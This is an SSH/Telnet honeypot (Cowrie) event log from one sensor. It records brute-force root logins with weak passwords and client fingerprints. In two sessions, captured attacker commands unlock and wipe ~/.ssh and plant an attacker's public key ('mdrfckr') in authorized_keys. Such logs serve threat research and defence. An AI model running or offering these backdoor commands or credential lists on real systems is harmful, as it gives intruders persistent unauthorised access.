{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:19:13.814010Z","src_ip":"36.255.220.204","session":"abac5b47f110"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T08:19:14.833210Z","src_ip":"36.255.220.204","session":"abac5b47f110"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:19:16.088627Z","src_ip":"36.255.220.204","session":"abac5b47f110"}
{"eventid":"cowrie.session.connect","src_ip":"36.255.220.204","src_port":58336,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b6f8e32b1ea","protocol":"ssh","message":"New connection: 36.255.220.204:58336 (1.2.3.4:22) [session: 9b6f8e32b1ea]","sensor":"my-vps","timestamp":"2025-08-26T08:19:16.342029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:19:16.351101Z","src_ip":"36.255.220.204","session":"9b6f8e32b1ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:19:16.605271Z","src_ip":"36.255.220.204","session":"9b6f8e32b1ea"}
{"eventid":"cowrie.session.connect","src_ip":"43.225.158.4","src_port":35857,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0b9b484bb95","protocol":"ssh","message":"New connection: 43.225.158.4:35857 (1.2.3.4:22) [session: e0b9b484bb95]","sensor":"my-vps","timestamp":"2025-08-26T08:19:17.625393Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:19:17.633246Z","src_ip":"43.225.158.4","session":"e0b9b484bb95"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:19:17.636301Z","src_ip":"36.255.220.204","session":"9b6f8e32b1ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:19:17.893730Z","src_ip":"43.225.158.4","session":"e0b9b484bb95"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:19:17.896038Z","src_ip":"36.255.220.204","session":"9b6f8e32b1ea"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:19:17.897098Z","src_ip":"36.255.220.204","session":"1c5e0c5206dc"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rd","message":"login attempt [root/p@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:19:18.947208Z","src_ip":"43.225.158.4","session":"e0b9b484bb95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:19:19.529144Z","src_ip":"43.225.158.4","session":"e0b9b484bb95"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T08:19:19.529884Z","src_ip":"43.225.158.4","session":"e0b9b484bb95"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T08:19:19.530839Z","src_ip":"43.225.158.4","session":"e0b9b484bb95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:19:19.803824Z","src_ip":"43.225.158.4","session":"e0b9b484bb95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:19:20.382412Z","src_ip":"43.225.158.4","session":"e0b9b484bb95"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T08:19:20.383192Z","src_ip":"43.225.158.4","session":"e0b9b484bb95"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T08:19:20.657203Z","src_ip":"43.225.158.4","session":"e0b9b484bb95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:19:20.658130Z","src_ip":"43.225.158.4","session":"e0b9b484bb95"}
{"eventid":"cowrie.session.connect","src_ip":"43.225.158.4","src_port":36240,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5196d11bd0c","protocol":"ssh","message":"New connection: 43.225.158.4:36240 (1.2.3.4:22) [session: f5196d11bd0c]","sensor":"my-vps","timestamp":"2025-08-26T08:19:20.914833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:19:20.919863Z","src_ip":"43.225.158.4","session":"f5196d11bd0c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:19:21.181431Z","src_ip":"43.225.158.4","session":"f5196d11bd0c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T08:19:22.228517Z","src_ip":"43.225.158.4","session":"f5196d11bd0c"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:19:23.496644Z","src_ip":"43.225.158.4","session":"f5196d11bd0c"}
{"eventid":"cowrie.session.connect","src_ip":"43.225.158.4","src_port":36619,"dst_ip":"1.2.3.4","dst_port":22,"session":"350f01134e8f","protocol":"ssh","message":"New connection: 43.225.158.4:36619 (1.2.3.4:22) [session: 350f01134e8f]","sensor":"my-vps","timestamp":"2025-08-26T08:19:23.758512Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:19:23.765299Z","src_ip":"43.225.158.4","session":"350f01134e8f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:19:24.029500Z","src_ip":"43.225.158.4","session":"350f01134e8f"}
{"eventid":"cowrie.session.connect","src_ip":"114.35.230.75","src_port":38441,"dst_ip":"1.2.3.4","dst_port":23,"session":"b6bbd5c29f8b","protocol":"telnet","message":"New connection: 114.35.230.75:38441 (1.2.3.4:23) [session: b6bbd5c29f8b]","sensor":"my-vps","timestamp":"2025-08-26T08:19:24.992979Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:19:25.100984Z","src_ip":"43.225.158.4","session":"350f01134e8f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:19:25.373537Z","src_ip":"43.225.158.4","session":"350f01134e8f"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:19:25.374896Z","src_ip":"43.225.158.4","session":"e0b9b484bb95"}
{"eventid":"cowrie.session.closed","duration":31.598496437072754,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:19:56.591407Z","src_ip":"114.35.230.75","session":"b6bbd5c29f8b"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":45262,"dst_ip":"1.2.3.4","dst_port":22,"session":"37fbb5bdd717","protocol":"ssh","message":"New connection: 45.88.8.186:45262 (1.2.3.4:22) [session: 37fbb5bdd717]","sensor":"my-vps","timestamp":"2025-08-26T08:20:02.067951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:20:03.447103Z","src_ip":"45.88.8.186","session":"37fbb5bdd717"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:20:03.448214Z","src_ip":"45.88.8.186","session":"37fbb5bdd717"}
{"eventid":"cowrie.login.success","username":"root","password":"P@55w0rd01","message":"login attempt [root/P@55w0rd01] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:20:06.378272Z","src_ip":"45.88.8.186","session":"37fbb5bdd717"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:20:07.393807Z","src_ip":"45.88.8.186","session":"37fbb5bdd717"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":61502,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d4cf0211fd2","protocol":"ssh","message":"New connection: 217.72.205.35:61502 (1.2.3.4:22) [session: 3d4cf0211fd2]","sensor":"my-vps","timestamp":"2025-08-26T08:20:17.794464Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:20:17.795682Z","src_ip":"217.72.205.35","session":"3d4cf0211fd2"}
{"eventid":"cowrie.session.connect","src_ip":"101.37.23.232","src_port":55338,"dst_ip":"1.2.3.4","dst_port":22,"session":"062f040ac739","protocol":"ssh","message":"New connection: 101.37.23.232:55338 (1.2.3.4:22) [session: 062f040ac739]","sensor":"my-vps","timestamp":"2025-08-26T08:20:23.906161Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:20:23.907120Z","src_ip":"101.37.23.232","session":"062f040ac739"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T08:20:24.112044Z","src_ip":"101.37.23.232","session":"062f040ac739"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:20:24.729489Z","src_ip":"101.37.23.232","session":"062f040ac739"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:20:24.936309Z","src_ip":"101.37.23.232","session":"062f040ac739"}
{"eventid":"cowrie.session.connect","src_ip":"103.31.39.72","src_port":35712,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ae46d159f0c","protocol":"ssh","message":"New connection: 103.31.39.72:35712 (1.2.3.4:22) [session: 0ae46d159f0c]","sensor":"my-vps","timestamp":"2025-08-26T08:20:29.498894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:20:29.500017Z","src_ip":"103.31.39.72","session":"0ae46d159f0c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:20:29.779002Z","src_ip":"103.31.39.72","session":"0ae46d159f0c"}
{"eventid":"cowrie.login.success","username":"root","password":"admin@2018","message":"login attempt [root/admin@2018] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:20:30.937539Z","src_ip":"103.31.39.72","session":"0ae46d159f0c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:20:31.519982Z","src_ip":"103.31.39.72","session":"0ae46d159f0c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T08:20:31.520886Z","src_ip":"103.31.39.72","session":"0ae46d159f0c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T08:20:31.522483Z","src_ip":"103.31.39.72","session":"0ae46d159f0c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:20:32.396445Z","src_ip":"103.31.39.72","session":"0ae46d159f0c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:20:33.068197Z","src_ip":"103.31.39.72","session":"0ae46d159f0c"}
